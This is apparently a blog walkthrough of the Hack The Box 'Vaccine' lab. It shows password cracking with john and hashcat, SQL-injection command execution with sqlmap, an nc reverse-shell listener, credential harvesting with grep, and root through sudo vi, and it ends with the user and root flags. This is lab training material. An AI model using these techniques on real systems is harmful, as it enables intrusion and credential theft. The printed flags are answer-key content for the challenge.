Top 5 This Week

Related Posts

HTB – Hack the Box – Tier 2 – 3rd Challange – Vaccine

Deep Dive: Solving HTB Tier 2 – Challenge 3 ‘Vaccine’

Join us in this technical exploration of the ‘Vaccine’ challenge, part of the “HTB – Hack the Box Series”. This tutorial is one of many in our series designed to advance your cybersecurity skills. Explore more challenges at: HTB – Hack the Box Series.

System Update and VPN Connectivity

Ensure your Kali Linux is updated for the latest functionalities and security patches:

$ sudo apt update
$ sudo apt full-upgrade -y

Establish a secure VPN connection to access the HTB environment:

$ sudo openvpn Downloads/starting_point_UserName.ovpn

Initial Reconnaissance with Nmap

Use Nmap to perform a comprehensive scan on the target system, identifying open ports and running services:

nmap -sC -sV -p-
└─$ nmap -sC -sV
Starting Nmap 7.93 ( ) at 2022-11-09 11:18 EST
Nmap scan report for
Host is up (0.044s latency).
Not shown: 997 closed tcp ports (conn-refused)
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:
|      Logged in as ftpuser
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxr-xr-x    1 0        0            2533 Apr 13  2021
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c0ee58077534b00b9165b259569527a4 (RSA)
|   256 ac6e81188922d7a7417d814f1bb8b251 (ECDSA)
|_  256 425bc321dfefa20bc95e03421d69d028 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-cookie-flags: 
|   /: 
|_      httponly flag not set
|_http-title: MegaCorp Login
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 9.26 seconds
  • Besides SSH and HTTP, what other service is hosted on this box? – ftp
  • This service can be configured to allow login with any password for specific username. What is that username? – Anonymous
  • What is the name of the file downloaded over this service? –
  • add the domain nameto the local hosts file
└─$ sudo nano /etc/hosts
[sudo] password for toor: 
└─$ cat /etc/hosts             localhost       kali

# HTB unika.htb vaccine.htb

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
  • ftp to the domain name, authenticate with Anonymous and with any password, get the file
└─$  ftp vaccine.htb
Connected to vaccine.htb.
220 (vsFTPd 3.0.3)
Name (vaccine.htb:toor): Anonymous
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>  get
local: remote:
229 Entering Extended Passive Mode (|||10886|)
150 Opening BINARY mode data connection for (2533 bytes).
100% |*********************************************************************************************************************************|  2533      774.21 KiB/s    00:00 ETA
226 Transfer complete.
2533 bytes received in 00:00 (60.43 KiB/s)
ftp> quit
221 Goodbye.


  • What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts? zip2john
└─$ locate zip2john               
└─$ zip2john > hash
ver 2.0 efh 5455 efh 7875 PKZIP Encr: TS_chk, cmplen=1201, decmplen=2594, crc=3A41AE06 ts=5722 cs=5722 type=8
ver 2.0 efh 5455 efh 7875 PKZIP Encr: TS_chk, cmplen=986, decmplen=3274, crc=1B1CCD6A ts=989A cs=989a type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
└─$ cat hash        $pkzip$2*1*1*0*8*24*5722*543fb39ed1a919ce7b58641a238e00f4cb3a826cfb1b8f4b225aa15c4ffda8fe72f60a82*2*0*3da*cca*1b1ccd6a*504*43*8*3da*989a*22290dc3505e51d341f31925a7ffefc181ef9f66d8d25e53c82afc7c1598fbc3fff28a17ba9d8cec9a52d66a11ac103f257e14885793fe01e26238915796640e8936073177d3e6e28915f5abf20fb2fb2354cf3b7744be3e7a0a9a798bd40b63dc00c2ceaef81beb5d3c2b94e588c58725a07fe4ef86c990872b652b3dae89b2fff1f127142c95a5c3452b997e3312db40aee19b120b85b90f8a8828a13dd114f3401142d4bb6b4e369e308cc81c26912c3d673dc23a15920764f108ed151ebc3648932f1e8befd9554b9c904f6e6f19cbded8e1cac4e48a5be2b250ddfe42f7261444fbed8f86d207578c61c45fb2f48d7984ef7dcf88ed3885aaa12b943be3682b7df461842e3566700298efad66607052bd59c0e861a7672356729e81dc326ef431c4f3a3cdaf784c15fa7eea73adf02d9272e5c35a5d934b859133082a9f0e74d31243e81b72b45ef3074c0b2a676f409ad5aad7efb32971e68adbbb4d34ed681ad638947f35f43bb33217f71cbb0ec9f876ea75c299800bd36ec81017a4938c86fc7dbe2d412ccf032a3dc98f53e22e066defeb32f00a6f91ce9119da438a327d0e6b990eec23ea820fa24d3ed2dc2a7a56e4b21f8599cc75d00a42f02c653f9168249747832500bfd5828eae19a68b84da170d2a55abeb8430d0d77e6469b89da8e0d49bb24dbfc88f27258be9cf0f7fd531a0e980b6defe1f725e55538128fe52d296b3119b7e4149da3716abac1acd841afcbf79474911196d8596f79862dea26f555c772bbd1d0601814cb0e5939ce6e4452182d23167a287c5a18464581baab1d5f7d5d58d8087b7d0ca8647481e2d4cb6bc2e63aa9bc8c5d4dfc51f9cd2a1ee12a6a44a6e64ac208365180c1fa02bf4f627d5ca5c817cc101ce689afe130e1e6682123635a6e524e2833335f3a44704de5300b8d196df50660bb4dbb7b5cb082ce78d79b4b38e8e738e26798d10502281bfed1a9bb6426bfc47ef62841079d41dbe4fd356f53afc211b04af58fe3978f0cf4b96a7a6fc7ded6e2fba800227b186ee598dbf0c14cbfa557056ca836d69e28262a060a201d005b3f2ce736caed814591e4ccde4e2ab6bdbd647b08e543b4b2a5b23bc17488464b2d0359602a45cc26e30cf166720c43d6b5a1fddcfd380a9c7240ea888638e12a4533cfee2c7040a2f293a888d6dcc0d77bf0a2270f765e5ad8bfcbb7e68762359e335dfd2a9563f1d1d9327eb39e68690a8740fc9748483ba64f1d923edfc2754fc020bbfae77d06e8c94fba2a02612c0787b60f0ee78d21a6305fb97ad04bb562db282c223667af8ad907466b88e7052072d6968acb7258fb8846da057b1448a2a9699ac0e5592e369fd6e87d677a1fe91c0d0155fd237bfd2dc49*$/pkzip$,
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
741852963        (     
1g 0:00:00:00 DONE (2022-11-09 12:27) 50.00g/s 614400p/s 614400c/s 614400C/s 123456..hawkeye
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
└─$ unzip                                     
[] index.php password: 
  inflating: index.php               
  inflating: style.css               
└─$ cat index.php   
<!DOCTYPE html>
  if(isset($_POST['username']) && isset($_POST['password'])) {
    if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
      $_SESSION['login'] = "true";
      header("Location: dashboard.php");


└─$ hashcat -m 0 2cb42f8734ea607eefed3b70af13bbd3 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.0+debian  Linux, None+Asserts, RELOC, LLVM 13.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
* Device #1: pthread-AMD Ryzen 5 5600H with Radeon Graphics, 2921/5906 MB (1024 MB allocatable), 6MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 2cb42f8734ea607eefed3b70af13bbd3
Time.Started.....: Thu Nov 10 13:16:13 2022 (0 secs)
Time.Estimated...: Thu Nov 10 13:16:13 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1598.9 kH/s (0.11ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 101376/14344385 (0.71%)
Rejected.........: 0/101376 (0.00%)
Restore.Point....: 98304/14344385 (0.69%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Dominic1 -> ilovehim123
Hardware.Mon.#1..: Util: 14%

Started: Thu Nov 10 13:15:49 2022
Stopped: Thu Nov 10 13:16:14 2022


  • What is the password for the admin user on the website? – qwerty789
  • What option can be passed to sqlmap to try to get command execution via the sql injection? (–os-shell)
  • sqlmap -h
  • nc mkfifo
python3 -c 'import pty;pty.spawn("/bin/bash");'
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 42756
sh: 0: can't access tty; job control turned off
$ whoami
$ find / -perm -4000 -type f 2>/dev/
sh: 2: cannot create /dev/: Is a directory
$ pwd
$ cd /var/www/html
$ ls
$ grep -i -R "pass" *
dashboard.php:    $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
index.php:  if(isset($_POST['username']) && isset($_POST['password'])) {
index.php:    if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
index.php:        <label for="login__password"><svg class="icon"><use xmlns:xlink="" xlink:href="#lock"></use></svg><span class="hidden">Password</span></label>
index.php:        <input id="login__password" type="password" name="password" class="form__input" placeholder="Password" required>
style.css:.form input[type='password'],
style.css:.login input[type='password'],
style.css:.login input[type='password'],
style.css:.login input[type='password']:focus,
style.css:.login input[type='password']:hover,
└─$ ssh [email protected]
The authenticity of host 'vaccine.htb (' can't be established.
ED25519 key fingerprint is SHA256:4qLpMBLGtEbuHObR8YU15AGlIlpd0dsdiGh/pkeZYFo.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'vaccine.htb' (ED25519) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-64-generic x86_64)

 * Documentation:
 * Management:
 * Support:

  System information as of Fri 11 Nov 2022 02:39:29 PM UTC

  System load:  0.15              Processes:             187
  Usage of /:   32.6% of 8.73GB   Users logged in:       0
  Memory usage: 19%               IP address for ens160:
  Swap usage:   0%

0 updates can be installed immediately.
0 of these updates are security updates.

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

postgres@vaccine:~$ sudo -l
[sudo] password for postgres: 
Matching Defaults entries for postgres on vaccine:

User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
postgres@vaccine:~$ ls
11  user.txt                                                                                               
postgres@vaccine:~$ cat user.txt                                                                           
postgres@vaccine:~$ sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf                                       
# whoami                                                                                                   
# cd /root                                                                                                 
# ls                                                                                                       
pg_hba.conf  root.txt  snap                                                                                
# cat root.txt                                                                                             
  • What program can the postgres user run as root using sudo? vi
  • user flag – ec9b13ca4d6229cd5cc1e09980965bf7
  • root flag – dd6e058e814260bc70e9bbdef2715849

Ethical Hacking Reminder

This guide provides a technical walkthrough for solving the ‘Vaccine’ challenge on HTB. We promote ethical hacking practices and encourage using these skills for enhancing cybersecurity knowledge and defense capabilities.

Cogeanu Marius
Cogeanu Marius
Marius Cogeanu is a distinguished IT consultant and cybersecurity virtuoso based in Prague, Czechia. With a rich 20-year journey in the IT realm, Marius has carved a niche in network security and technological solutions, adeptly harmonizing tech with business requirements. His experience spans from Kyndryl to IBM, and as a valued independent consultant, where he's renowned for his innovative approaches in enhancing business operations with cutting-edge tech.Marius's forte lies in demystifying complex IT concepts, ensuring clarity and alignment for stakeholders at all levels. His commitment to staying at the forefront of industry trends and seeking innovative solutions cements his status as a go-to expert in cybersecurity. Driven by a fervent passion for technology and its potential to revolutionize businesses, Marius thrives on tackling challenging ventures, applying his prowess in network design, IT service management, and strategic planning.Currently, Marius is focused on leading-edge IT project management, infrastructure design, and fortifying cybersecurity, guiding clients through the intricate digital landscape with unmatched expertise and insight.Discover more on


Please enter your comment!
Please enter your name here

Popular Articles